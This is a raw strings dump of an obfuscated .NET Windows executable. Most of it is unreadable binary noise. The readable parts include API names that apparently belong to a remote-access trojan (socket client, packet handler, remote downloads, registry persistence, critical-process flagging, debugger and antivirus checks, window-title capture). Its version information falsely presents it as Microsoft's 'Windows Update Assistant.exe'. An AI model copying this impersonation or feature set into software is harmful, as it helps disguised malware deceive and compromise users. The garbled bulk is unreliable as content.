!This program cannot be run in DOS mode.
`.rsrc
`.reloc
_@jj/w
/yV[6&
~$dzRI
MC(Fn4
t S6cK
mj][i,
9Y\<i|
S~S,w"
lT+"W9
Fx-gtT
=[P%$9
xV.Grs
S@No(b
L82Ic\
h!B6H]
.9OfPc
QxF7*m
bn@T'.
C(uvQVz
U~%U?HE
>,NZnD
'F<ML_
jAfFYn
"'Yrtq
/9A7+z;
>PmQ_G
>+:%*2
X}u##D
LdVP?ph
WEMk!j
N)?P5[
YT4%Ek
cY>d;->
)w)Y8}Z9uMY
2wRt*9+
sjlw)Mc
yqmM"D
iHR?WAQ
jR`wUA
30gO}9
~G9ZAmS
[Jx~Md
?7F#3p
x6v3^E
s?`nI^`h{
wBp(vm
aD;gmg
p:fk=J4
ug<K2&
4nI^FG
/V6>mU
FLUBBF
=VbEnd
}<xKc@
0<3xkr|4A
P]!CSI_
nL3O+L
y2-cSR
_&D:.p
_.46xb
Y(L2l[
%/\2|A
Km)U5s
o4?g$E`
A ^ei4W
[T?JUs
/_%*pN
B^I;hAW<
!O Q:')
^3uCWy
9E0gC"
Hv1-?Z
oT3=jx
p/LI9Q$t[
l.x_v,
~c]FfO78
cg\HgD
\Zfx+:
U^c!r^XR
z`(ps.
80#Y[,3!
)l.@")V
?uJh)"o
J`h\@;
B`]1e
}t|{,Y)
2\$s\k^d
$G}dKN
Ta)8~S
pqrk4?[
1s$&;}
%>5XnQl
=5%z]@M
3|JvYO_
pAb/b/`s
'`}uKR:
aP822
h'%S@y
7>4!Fzr
W{sf=@
=--^/g,
,6#XQS6
_q=k }
`VN;}V
b5BXqRo
^B=V`R
"Wf5L{
%?Cx6O
!o k"e
R/2&0|
<a2:};r
XK:3Z-a2
.]X&~(
pS%[JP?,
8[[DQP
bXf>bj_
!ML}Sg
)>#lpa
",y@@Q
K7s~(rR
i@eF-G
%Pe;n(
9kte%+
* ~R4"8
vL~a8&
gb+%&8
XGR yM
Y#:%&8
l$XZa8]
9 X8'-Z
5H5a8E
9 d=i^Z =_
Au%&8f
X ntinT
Fv-a87
ntdlT
X l.dlT
NtCoT
X ntinT
fhIa8M
ntdlT
NtCoT
Z >0<ca8
Q!0a8m
njZ kU
X l.dlT
Z eCYa8#
QSKZ EP
2AZ *q
_CorExeMain
mscoree.dll
v4.0.30319
#Strings
#Strings
#Schema
ujxckjczud&&
>1$oNQTXniul"EynrQ1KRCQP,
Action`10
cc967ef09d143d65cec7d721e1285cb40
cdeaa3f7524deeaa6db8773bc33c62090
cd3e19d49eb7073b5cdab23185c4f2e01
c3ad466b0c83b540d4704c7e51adf0f01
c59c3a1a3135a9818a7987f6dff7fe331
c30b0fa7843e82c982115c09cdcf9f361
c222db56cc22c9c2d3693783767772a91
IEnumerable`1
CallSite`1
List`1
c90bbfaa16d3e753ea47358837adc9e02
c7f8ee1bdee6edbff44c7372247edb512
cdee14a3f93986be2645150e12722bc22
Microsoft.Win32
ToUInt32
ToInt32
cd828bc264604c1019eeb591969758a52
c49a32198154305376d341d477a88cf72
c5c1273cda00a170ef87aaf449c6cb7b2
c80100bbeff9af75b79465589f06bb8e2
X509Certificate2
ca637a05f9b153128adcc1e004be49973
ToUInt64
ToInt64
cf686a086e3a80d250c685a36de35ab74
c2ffd6489f6c284c34f6ea5f1cb13d9f4
c37fecba71ea94749a3149aeb0cda9675
c898602c7e2d651b9bd93f1e9c083b895
ToUInt16
ToInt16
HMACSHA256
c26240c233101b9aeaef254a328f8c196
c9f3bc9d406cb6013f2e69af25a066d96
c24da1a738275dbad062e57e97f771e27
c2d5d91be06d69bd25e9ebbc55c00f4a7
c0cd4e806b023ad1f253d292e20796ca7
c17db9e050e57ed6eeb06930f112e2b28
ccd21cbbbd37a615e817b401874408c38
get_UTF8
caad94cb1774c5311f6e53c30839cda19
c5c5d5a41a26acb3968c4054a34399949
ca50b3050e034346585c8f4fea9318989
c9ba8ab020af1dac85c28e3ae668f9a99
cc549fbe364cdebe38a240871654ff5d9
<Module>
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
MapNameToOID
get_FormatID
GetHINSTANCE
get_ASCII
System.IO
ES_CONTINUOUS
get_IV
set_IV
GenerateIV
value__
c79c6453c53ecc3935e4619d5700b23ea
ReadServertData
cfdd49e22bb45d4085acfbad9f56780db
mscorlib
c79d7477ac60765d8f2ee1fa9729a8c0c
c8bfa9c95177ab96d5067a58144c3f26c
c869fe7c827b58bc8f37df88ddd50eeec
System.Collections.Generic
Microsoft.VisualBasic
get_c074ca04a8282ed1e8e7ab92e51e2742d
c696a5af8ffcfe8e477818963258a073d
ce16e2f04cbd70d157aa7edf728dab15d
c6520137e72ed4b8dcc587ecb1007cf6d
ca67f4d38e9408544a59ca927ab4ccf6d
c266c88149b9276025c29ea50c7d54dad
EndRead
BeginRead
get_CurrentThread
c8edddcac44fab61635c5a44de98153bd
SHA256Managed
get_IsAttached
get_Connected
get_Guid
Append
RegistryValueKind
set_IsBackground
GetMethod
ujxckjczud
c8a13d39b25613907561f9398ab87616e
c7a74da7c9667b6d13f36581efda0da9e
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
get_Unicode
ce205ba9dcb9a066297f59105a8ca74ee
DeleteSubKeyTree
get_Message
Invoke
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
SaveBytesToFile
IsInRole
WindowsBuiltInRole
GetActiveWindowTitle
get_Module
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FullyQualifiedName
get_FileName
set_FileName
GetTempFileName
GetFileName
fileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
ValueType
ProtocolType
GetType
SocketType
GetElementType
FileShare
System.Core
MethodBase
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
SuppressIldasmAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ConfusedByAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_IsAlive
add_ResourceResolve
add_AssemblyResolve
Remove
ujxckjczud.exe
set_BlockSize
get_InputBlockSize
get_OutputBlockSize
get_TotalSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
cab4558c64de98ae3f1ef20320dccdd7f
c9e58f652186bc7a1d32767b52696918f
IndexOf
c1c2e5825c12a577c04ba79214f02e5af
ce6fdf791c1ce29b329068547c2e698af
c7c42bbd3c41b7ffdfe6b29ae2d297acf
cd7d20763071225193fe25c678b1c8fff
CryptoConfig
System.Threading
set_Padding
add_SessionEnding
SystemEvents_SessionEnding
UTF8Encoding
System.Drawing.Imaging
IsLogging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
BytesAsString
GetAsString
GetString
BytesAsHexString
Substring
System.Drawing
set_ErrorDialog
ComputeHash
strToHash
GetHash
VerifyHash
get_ExecutablePath
GetTempPath
get_Length
StartsWith
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
TransformFinalBlock
TransformBlock
RtlSetProcessIsCritical
Marshal
NetworkCredential
System.Security.Principal
WindowsPrincipal
kernel32.dll
user32.dll
ntdll.dll
GetManifestResourceStream
FileStream
DeflateStream
NetworkStream
SslStream
DecodeFromStream
CryptoStream
GZipStream
MemoryStream
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
ToBoolean
X509Chain
AppDomain
get_CurrentDomain
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Globalization
System.Reflection
X509CertificateCollection
ManagementObjectCollection
get_Position
set_Position
CryptographicException
ArgumentNullException
ArgumentException
Intern
Unknown
ImageCodecInfo
MethodInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
Microsoft.CSharp
System.Linq
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
DESCryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
sender
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
GetEncoder
Buffer
Integer
Debugger
ManagementObjectSearcher
ResolveEventHandler
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
IEnumerator
ManagementObjectEnumerator
GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
NumberStyles
GetManifestResourceNames
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Encode2Bytes
Rfc2898DeriveBytes
ReadAllBytes
DecodeFromBytes
SwapBytes
LoadFileAsBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
ResolveEventArgs
SessionEndingEventArgs
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
get_Chars
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
Compress
Decompress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
Antivirus
JCEsTmpjtlAHUTVOExXeAqZVMOws
Concat
ImageFormat
format
FindObject
ManagementBaseObject
ForcePathObject
Collect
Connect
Reconnect
VirtualProtect
System.Net
Target
Client.Handle_Packet
Socket
op_Explicit
ClientOnExit
IAsyncResult
ToUpperInvariant
WebClient
InitializeClient
AuthenticateAsClient
System.Management
Environment
get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
Decrypt
Encrypt
ParameterizedThreadStart
Convert
FailFast
ToList
MoveNext
System.Text
GetWindowText
GetForegroundWindow
set_CreateNoWindow
CloseMutex
InitializeArray
ToArray
get_AsArray
get_Key
set_Key
CreateSubKey
DeleteSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
GetCallingAssembly
GetExecutingAssembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
set_Capacity
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
Confuser.Core 1.5.0+b5197549e4
WrapNonExceptionThrows
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName .NET Framework 4 Client Profile
1.0.0.0
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
Microsoft Corporation
FileDescription
Windows Update
FileVersion
1.0.0.0
InternalName
Windows Update Assistant.exe
LegalCopyright
Microsoft Corporation. All rights reserved.
LegalTrademarks
OriginalFilename
Windows Update Assistant.exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0